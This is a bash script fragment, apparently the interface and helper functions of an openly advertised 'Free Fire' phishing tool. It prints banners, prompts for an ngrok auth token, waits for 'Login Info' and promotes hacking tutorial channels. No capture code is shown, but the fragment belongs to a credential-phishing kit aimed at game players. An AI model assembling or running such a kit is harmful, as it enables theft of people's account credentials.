echo -e "\e[93m 
 ███▄    █   ▄████  ██▀███   ▒█████   ██ ▄█▀
 ██ ▀█   █  ██▒ ▀█▒▓██ ▒ ██▒▒██▒  ██▒ ██▄█▒ 
▓██  ▀█ ██▒▒██░▄▄▄░▓██ ░▄█ ▒▒██░  ██▒▓███▄░ 
▓██▒  ▐▌██▒░▓█  ██▓▒██▀▀█▄  ▒██   ██░▓██ █▄ 
▒██░   ▓██░░▒▓███▀▒░██▓ ▒██▒░ ████▓▒░▒██▒ █▄
░ ▒░   ▒ ▒  ░▒   ▒ ░ ▒▓ ░▒▓░░ ▒░▒░▒░ ▒ ▒▒ ▓▒
░ ░░   ░ ▒░  ░   ░   ░▒ ░ ▒░  ░ ▒ ▒░ ░ ░▒ ▒░
   ░   ░ ░ ░ ░   ░   ░░   ░ ░ ░ ░ ▒  ░ ░░ ░ 
         ░       ░    ░         ░ ░  ░  ░   
\e[0m\n"
echo ""
echo ""
read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Want to give \e[96mNgrok \e[32mToken ? \e[1;91m (y/n) : \e[0m' option
echo""
echo""
echo""

if [[ $option == *'y'* ]]; then
clear
echo -e $'\e[1;91m\e[0m\e[1;91m\e[0m\e[1;96m\e[0m\e[1;91m   ----------------------------------------  \e[1;91m\e[0m'
echo -e $'\e[1;96m\e[0m\e[1;77m\e[0m\e[1;96m\e[0m\e[1;91m  !!        Requirement Ngrok Token       !!\e[0m'
echo -e $'\e[1;91m\e[0m\e[1;91m\e[0m\e[1;96m\e[0m\e[1;91m   ----------------------------------------- \e[1;91m\e[0m'
echo ""
echo""
echo -e "\e[31m[\e[32m*\e[31m]\e[33m Visit \e[32mngrok.com \e[m "
echo ""
echo -e "\e[31m[\e[32m*\e[31m]\e[33m Sign up & Click Getting Started or Authtoken Button & Copy Auth Token \e[m "
echo ""
read -p $'\e[31m[\e[32m*\e[31m]\e[33m Input AuthToken Only \e[91m[Ex. \e[92m2cEG2LcBt**********WK5Ntc \e[92m] : \e[0m' token
./ngrok config add-authtoken $token
echo ""
fi
if [[ $option == *'n'* ]]; then
clear
fi
}



end () {
echo ""
echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;95m Waiting For Login Info, \e[92mCtrl + C \e[1;95mto Exit...\e[0m "
echo ""
seq 1 43200 | while read i; do echo -en "\r Running .     $i s /43200 s";sleep 0.1;echo -en "\r Running ..    $i s /43200 s";sleep 0.1;echo -en "\r Running ...   $i s /43200 s";sleep 0.1;echo -en "\r Running ....  $i s /43200 s";sleep 0.1;echo -en "\r Running ..... $i s /43200 s";sleep 0.1;echo -en "\r Running     . $i s /43200 s";sleep 0.1;echo -en "\r Running  .... $i s /43200 s";sleep 0.1;echo -en "\r Running   ... $i s /43200 s";sleep 0.1;echo -en "\r Running    .. $i s /43200 s";sleep 0.1;echo -en "\r Running     . $i s /43200 s";sleep 0.1; done
}


## Exit message
msg_exit() {
echo ""
echo -e "\e[91m[\e[92m+\e[91m] \e[92m Thank you For using this tool. Have a good day. \e[m "
echo ""
echo -e "\e[1m\e[36m[+] More Hacking Totorial Chack this Website :\e[93m www.onlinehacking.org \e[m "
echo ""
echo -e "\e[1m\e[95m[+] Join Telegarm Channel :\e[93m https://t.me/OnlineHacking \e[m "
echo ""
echo ""
}


hotspot() {
echo ""
echo""
echo -e " \e[1;33m[\e[0m\e[1;77m~\e[0m\e[1;33m]\e[0m\e[1;36m \e[96m Turn On Mobile Hostpot \e[0m"
echo ""
echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m if you not on your device hotspot. link not generate  "
echo ""
echo ""
read -p $' \e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Click Enter to Continue : \e[0m' option
echo""
if [[ $option == *''* ]]; then
echo ""

fi
}


logo_last() {
clear
 echo -e "\e[96m=======================\e[93m   ONLINE HACKING  \e[96m=======================\e[92m \e[34m
Online Hacking © \e[92m
    ██████  █    ██  ███▄ ▄███▓ ▄▄▄       ███▄    █ 
  ▒██    ▒  ██  ▓██▒▓██▒▀█▀ ██▒▒████▄     ██ ▀█   █ 
  ░ ▓██▄   ▓██  ▒██░▓██    ▓██░▒██  ▀█▄  ▓██  ▀█ ██▒
    ▒   ██▒▓▓█  ░██░▒██    ▒██ ░██▄▄▄▄██ ▓██▒  ▐▌██▒
  ▒██████▒▒▒▒█████▓ ▒██▒   ░██▒ ▓█   ▓██▒▒██░   ▓██░
  ▒ ▒▓▒ ▒ ░░▒▓▒ ▒ ▒ ░ ▒░   ░  ░ ▒▒   ▓▒█░░ ▒░   ▒ ▒ 
  ░ ░▒  ░ ░░░▒░ ░ ░ ░  ░      ░  ▒   ▒▒ ░░ ░░   ░ ▒░
  ░  ░  ░   ░░░ ░ ░ ░      ░     ░   ▒      ░   ░ ░ 
        ░     ░            ░         ░  ░         ░ "
            echo ""
	    echo -e "\e[96m========================\e[93m WAIT FOR START \e[96m========================= \e[93m" 
            echo ""
            echo ""
}




## LOGO 1
logo1() {
#clolors
white='\e[1;37m'
green='\e[0;32m'
blue='\e[1;34m'
red='\e[1;31m'
yellow='\e[1;33m' 
echo ""
banner() {
echo -e ""
echo -e "\e[33m
  ███████╗██████╗ ███████╗███████╗    ███████╗██╗██████╗ ███████╗ 
  ██╔════╝██╔══██╗██╔════╝██╔════╝    ██╔════╝██║██╔══██╗██╔════╝ 
  █████╗  ██████╔╝█████╗  █████╗█████╗█████╗  ██║██████╔╝█████╗   
  ██╔══╝  ██╔══██╗██╔══╝  ██╔══╝╚════╝██╔══╝  ██║██╔══██╗██╔══╝   
  ██║     ██║  ██║███████╗███████╗    ██║     ██║██║  ██║███████╗ 
  ╚═╝     ╚═╝  ╚═╝╚══════╝╚══════╝    ╚═╝     ╚═╝╚═╝  ╚═╝╚══════╝  \e[0m\n"
echo -e "\e[95m 
         ██████╗ ███╗   ██╗██╗     ██╗███╗   ██╗███████╗    
        ██╔═══██╗████╗  ██║██║     ██║████╗  ██║██╔════╝    
        ██║   ██║██╔██╗ ██║██║     ██║██╔██╗ ██║█████╗      
        ██║   ██║██║╚██╗██║██║     ██║██║╚██╗██║██╔══╝      
        ╚██████╔╝██║ ╚████║███████╗██║██║ ╚████║███████╗    
         ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚═╝╚═╝  ╚═══╝╚══════╝    
                                                            
     ██╗  ██╗ █████╗  ██████╗██╗  ██╗██╗███╗   ██╗ ██████╗   
     ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██║████╗  ██║██╔════╝   
     ███████║███████║██║     █████╔╝ ██║██╔██╗ ██║██║  ███╗  
     ██╔══██║██╔══██║██║     ██╔═██╗ ██║██║╚██╗██║██║   ██║  
     ██║  ██║██║  ██║╚██████╗██║  ██╗██║██║ ╚████║╚██████╔╝  
     ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝ ╚═════╝  \e[95;1m \e[0m\n"
  echo""    
  echo -e $'\e[1;33m\e[0m\e[1;31m  ██████████\e[0m'"\e[1;37m██████████"'\e[1;33m\e[0m\e[0;32m██████████\e[0m' '\e[1;32m\e[0m\e[1;33m FREE FIRE PHISHING TOOL \e[0m''\e[1;37m\e[0m\e[1;37m [v 2.8] \e[0m'                                       
  echo ""
   echo -e $'\e[1;33m\e[0m\e[1;33m  [\e[0m\e[1;32m Github :- \e[36mhttps://github.com/OnlineHacKing/FreeFire-Phishing \e[0m\e[1;32m\e[0m\e[1;33m] \e[0m'
   echo ""
      echo -e $'\e[1;37m\e[0m\e[1;37m    +-+-+-+-+-+-+ +-+-+-+-+-+-+-+ >>\e[0m'
      echo -e "\e[93m    |O|n|l|i|n|e| |H|a|c|k|i|n|g|"      
      echo -e $'\e[1;37m\e[0m\e[1;37m    +-+-+-+-+-+-+ +-+-+-+-+-+-+-+ >>\e[0m' 
      echo -e $'\e[1;37m\e[0m\e[1;37m    +-+-+-+-+-+ >>\e[0m'
      echo -e "\e[95m    |S|U|M|A|N|"      
      echo -e $'\e[1;37m\e[0m\e[1;37m    +-+-+-+-+-+ >>\e[0m' 
      echo ""                                                
      }
      banner
                           echo ""
}



logo3() {
echo -e ""
clear
echo -e ""
echo -e "\e[33m
  ███████╗██████╗ ███████╗███████╗    ███████╗██╗██████╗ ███████╗ 
  ██╔════╝██╔══██╗██╔════╝██╔════╝    ██╔════╝██║██╔══██╗██╔════╝ 
  █████╗  ██████╔╝█████╗  █████╗█████╗█████╗  ██║██████╔╝█████╗   
  ██╔══╝  ██╔══██╗██╔══╝  ██╔══╝╚════╝██╔══╝  ██║██╔══██╗██╔══╝   
  ██║     ██║  ██║███████╗███████╗    ██║     ██║██║  ██║███████╗ 
  ╚═╝     ╚═╝  ╚═╝╚══════╝╚══════╝    ╚═╝     ╚═╝╚═╝  ╚═╝╚══════╝  \e[0m\n"
echo -e " "
}

l_logo() {
clear
echo -e "\e[92m
SUMAN ©\e[34m
         ██████╗ ███╗   ██╗██╗     ██╗███╗   ██╗███████╗    
        ██╔═══██╗████╗  ██║██║     ██║████╗  ██║██╔════╝    
        ██║   ██║██╔██╗ ██║██║     ██║██╔██╗ ██║█████╗      
        ██║   ██║██║╚██╗██║██║     ██║██║╚██╗██║██╔══╝      
        ╚██████╔╝██║ ╚████║███████╗██║██║ ╚████║███████╗    
         ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚═╝╚═╝  ╚═══╝╚══════╝    
                                                            
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗██╗███╗   ██╗ ██████╗   
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██║████╗  ██║██╔════╝   
    ███████║███████║██║     █████╔╝ ██║██╔██╗ ██║██║  ███╗  
    ██╔══██║██╔══██║██║     ██╔═██╗ ██║██║╚██╗██║██║   ██║  
    ██║  ██║██║  ██║╚██████╗██║  ██╗██║██║ ╚████║╚██████╔╝  
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝ ╚═════╝   
ONLINE HACKING			  							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.onlinehacking.in  \e[93m/  \e[92mwww.onlinehacking.org  "
echo ""
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/OnlineHacKing  "
echo ""
echo -e " \e[97mTelegram : \e[0m\e[34mhttps://t.me/OnlineHacKing  "
echo ""

}


		   






